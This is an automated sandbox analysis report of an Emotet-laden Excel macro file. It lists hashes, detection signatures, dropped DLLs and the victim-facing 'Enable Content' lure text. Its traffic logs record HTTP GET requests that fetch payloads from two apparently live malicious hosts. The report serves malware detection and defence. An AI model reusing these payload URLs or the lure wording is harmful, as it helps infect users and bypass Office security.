Windows Analysis Report DOC-0212.xlsm

Overview

General Information

Sample Name:	DOC-0212.xlsm
Analysis ID:	532596
MD5:	aa4f296ed678b18394a365861777241c
SHA1:	cedfd0d995958b8550f36d037c732854e23c68c5
SHA256:	20d3da22e72baf1a0e865621f9bb0af55998db0c4c534e847f30a084113eec8c
Tags:	xlsm
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

Sigma detected: Emotet RunDLL32 Process Creation

Document exploit detected (creates forbidden files)

Antivirus detection for URL or domain

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains functionality for execution timing, often used to detect debuggers

Document misses a certain OLE stream usually present in this Microsoft Office document type

Abnormal high CPU Usage

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Yara detected Xls With Macro 4.0

Drops PE files to the user directory

Excel documents contains an embedded macro which executes code when the document is opened

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://www.duoyuhudong.cn/wp-content/we8xi/vvC:	Avira URL Cloud: Label: malware
Source: http://www.duoyuhudong.cn/wp-content/we8xi/	Avira URL Cloud: Label: malware

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E450927 FindFirstFileExW,

3_2_6E450927

Software Vulnerabilities:

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: VZZdgPFp2xiOJtfpv[1].dll.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: sadabahar.com.np

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80

Networking:

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.25content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://sadabahar.com.np/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encoding,User-Agentdate: Thu, 02 Dec 2021 13:31:35 GMTserver: LiteSpeedData Raw: 31 30 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5b ff 73 db 36 b2 ff d9 fe 2b 60 7a 6a 8b 2d 49 51 92 65 59 94 e5 de 35 4d e7 fd d0 5e 6f 9a 76 de bc 49 f2 3c 10 09 51 48 28 80 0f 80 64 fb 14 fd ef 37 0b 90 14 bf c9 56 9c a4 b9 99 d7 78 1c 93 c0 62 b1 58 2c b0 9f 5d 80 d7 27 3f fe fa e2 f7 ff f9 e7 4b b4 50 cb e4 e6 f8 1a fe a0 04 b3 78 6a 11 e6 fe f1 ca ba 39 3e be 5e 10 1c dd 1c 1f 5d 2f 89 c2 28 5c 60 21 89 9a 5a 7f fc fe 93 7b 65 15 e5 0c 2f c9 d4 5a 53 72 97 72 a1 2c 14 72 a6 08 53 53 eb 8e 46 6a 31 8d c8 9a 86 c4 d5 2f 0e a2 8c 2a 8a 13 57 86 38 21 d3 9e 83 96 94 d1 e5 6a 99 17 68 b6 09 65 ef 91 20 c9 d4 4a 05 9f d3 84 58 68 21 c8 7c 6a 2d 94 4a 83 6e 37 5e a6 b1 c7 45 dc bd 9f b3 6e af 07 6d 8e ae 15 55 09 b9 f9 27 8e 09 62 5c a1 39 5f b1 08 9d 9d 5e f5 7b bd 09 7a 85 23 3c c3 0b 2c d0 2f ab 44 51 f4 82 33 a9 c4 2a 54 94 b3 eb ae 69 7a 6c 86 a9 87 73 2e f8 8c 2b 79 5e 0c e6 7c 89 ef 5d ba c4 31 71 53 41 60 b0 41 82 45 4c ce 51 f7 e6 f8 ba 10 f8 3c 62 12 08 e6 44 85 8b 73 23 f5 79 b7 3b e7 4c 49 2f e6 3c 4e 08 4e a9 f4 42 be 3c ac a5 f4 ee 60 a4 35 62 0b 27 8a 08 86 15 b1 90 7a 48 c9 d4 c2 69 9a d0 10 c3 78 ba 42 ca ef ee 97 89 85 f4 b8 a6 d6 63 83 47 67 02 ff df 8a 4f d0 4f 84 44 65 35 cb a0 db 95 b9 d6 40 5e 8f a5 dd 39 21 51 d7 aa 0e f9 0b c8 f2 82 2f 97 84 29 79 98 50 61 46 5d 92 ee e8 e8 5a 86 82 a6 2a d3 8e 22 f7 aa fb 0e af b1 29 d5 06 73 74 47 59 c4 ef bc db bb 94 2c f9 3b fa 8a 28 45 59 2c d1 14 6d ac 19 96 e4 0f 91 58 81 36 39 19 bc e9 be e9 66 53 f1 a6 ab cd 40 be e9 86 5c 90 37 5d dd f8 4d b7 37 f0 7a 9e ff a6 3b ea df 8f fa 6f ba 96 63 91 7b 65 05 96 97 b2 d8 72 2c b9 8e 9f c7 4f ae 63 cd 4d ae e3 97 86 a1 5c 6b 86 7c 25 42 62 05 1b 2b e4 2c c4 4a 8b 91 c9 6b c4 ad 4d de 9b ee 5d ea 52 16 26 ab 88 c8 37 dd 77 52 17 e8 66 ae 20 09 c1 92 78 4b ca bc 77 f2 fb 35 11 d3 a1 77 e5 f5 ad ed 76 72 7c 74 74 74 32 5f 31 bd 56 3a c4 c1 8e b2 37 6b 2c 10 73 84 c3 1d 3a c5 5e 28 08 56 e4 65 42 60 d6 3a 56 88 d9 1a 4b cb 76 d2 29 f5 62 a2 5e c0 86 70 af ce ce ca 6f 1d ab 1f 59 f6 24 67 8c 64 87 e4 8c f1 f4 95 12 94 c5 de 5c f0 e5 8b 05 16 2f 78 44 26 a9 17 26 04 8b df 48 a8 3a be e3 3b d4 33 5b 0a f5 16 84 c6 0b 65 3b a9 37 a7 49 f2 3b b9 57 1d ec c1 82 78 e8 a8 05 95 0e b1 1d df f1 ed 09 99 52 4f f1 1f b1 c2 7f fc f6 73 c7 9e 08 a2 56 82 a1 e7 33 56 86 b1 43 a6 d3 2a eb 6d 31 ac b0 43 8c b6 54 53 4f 99 31 da 13 e5 49 11 4e 89 a3 bc 88 cc 89 98 2a cf 2c ea ba d9 3a 18 d4 99 e9 59 fe f0 f0 3b 8e ff 81 97 a4 63 c1 3e 6d d9 af fd b7 30 6c c2 a2 17 0b 9a 44 1d 65 6f e7 5c 74 f8 f4 ef 42 e0 87

Source: EXCEL.EXE, 00000000.00000002.753340803.00000000058F9000.00000004.00000001.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.coma/3 equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EXCEL.EXE, 00000000.00000002.753340803.00000000058F9000.00000004.00000001.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.c
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.co
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.n
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/w
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-i
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-inc
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-inclu
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/p
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqI
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sad
Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/A
Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/J
Source: EXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
Source: EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp	String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/
Source: EXCEL.EXE, 00000000.00000002.747914705.000000000046C000.00000004.00000020.sdmp	String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/vvC:
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8FA61E5.png

Jump to behavior

Source: unknown

DNS traffic detected: queries for: sadabahar.com.np

Source: global traffic	HTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 3.2.rundll32.exe.2ab960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2ab960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
Source: Screenshot number: 4	Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
Source: Screenshot number: 4	Screenshot OCR: Enable Content" button 6 7 8 9 ,, G' 11 12 13 14 15 16 17 18 ^
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
Source: Screenshot number: 8	Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
Source: Screenshot number: 8	Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 17 18 ^
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
Source: Document image extraction number: 0	Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
Source: Document image extraction number: 0	Screenshot OCR: Enable Content" button
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
Source: Document image extraction number: 1	Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
Source: Document image extraction number: 1	Screenshot OCR: Enable Content" button

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\besta.ocx			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll			Jump to dropped file

Creates files inside the system directory

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\

Jump to behavior

Detected potential crypto function

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E6753	0_2_025E6753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E6743	0_2_025E6743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E6340	0_2_025E6340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E66F3	0_2_025E66F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E66E8	0_2_025E66E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE1291	3_2_01EE1291
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDEA55	3_2_01EDEA55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDEDED	3_2_01EDEDED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC51EC	3_2_01EC51EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECA3E7	3_2_01ECA3E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC19C0	3_2_01EC19C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC75D2	3_2_01EC75D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDDDA5	3_2_01EDDDA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED0BA4	3_2_01ED0BA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDE5A7	3_2_01EDE5A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED89A2	3_2_01ED89A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC43BE	3_2_01EC43BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC59BF	3_2_01EC59BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDD7BE	3_2_01EDD7BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED85B8	3_2_01ED85B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDE3B5	3_2_01EDE3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC358B	3_2_01EC358B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDDB87	3_2_01EDDB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC8D80	3_2_01EC8D80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC4B81	3_2_01EC4B81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED3782	3_2_01ED3782
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC7795	3_2_01EC7795
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED1591	3_2_01ED1591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECB191	3_2_01ECB191
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECCF6E	3_2_01ECCF6E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECBD61	3_2_01ECBD61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE0370	3_2_01EE0370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED6540	3_2_01ED6540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECA92F	3_2_01ECA92F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED9124	3_2_01ED9124
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECF73B	3_2_01ECF73B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDCD35	3_2_01EDCD35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED3D0C	3_2_01ED3D0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDBF0C	3_2_01EDBF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED590E	3_2_01ED590E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED970A	3_2_01ED970A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDE10A	3_2_01EDE10A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC4D1E	3_2_01EC4D1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECCB13	3_2_01ECCB13
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED56E9	3_2_01ED56E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECC0EA	3_2_01ECC0EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC40E2	3_2_01EC40E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED40FE	3_2_01ED40FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC46FA	3_2_01EC46FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC1EFB	3_2_01EC1EFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED62F5	3_2_01ED62F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED4CF5	3_2_01ED4CF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC84F0	3_2_01EC84F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE20CE	3_2_01EE20CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED10CD	3_2_01ED10CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC92C1	3_2_01EC92C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC2CC2	3_2_01EC2CC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE1CDB	3_2_01EE1CDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC90D4	3_2_01EC90D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED28D5	3_2_01ED28D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED52D1	3_2_01ED52D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECF48A	3_2_01ECF48A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECA083	3_2_01ECA083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECFE9D	3_2_01ECFE9D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDE899	3_2_01EDE899
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDA29B	3_2_01EDA29B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED009A	3_2_01ED009A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED0E97	3_2_01ED0E97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDCE90	3_2_01EDCE90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED0A93	3_2_01ED0A93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC3A6C	3_2_01EC3A6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC6869	3_2_01EC6869
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECB464	3_2_01ECB464
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECEE60	3_2_01ECEE60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC387F	3_2_01EC387F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECFA78	3_2_01ECFA78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDB677	3_2_01EDB677
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC544C	3_2_01EC544C
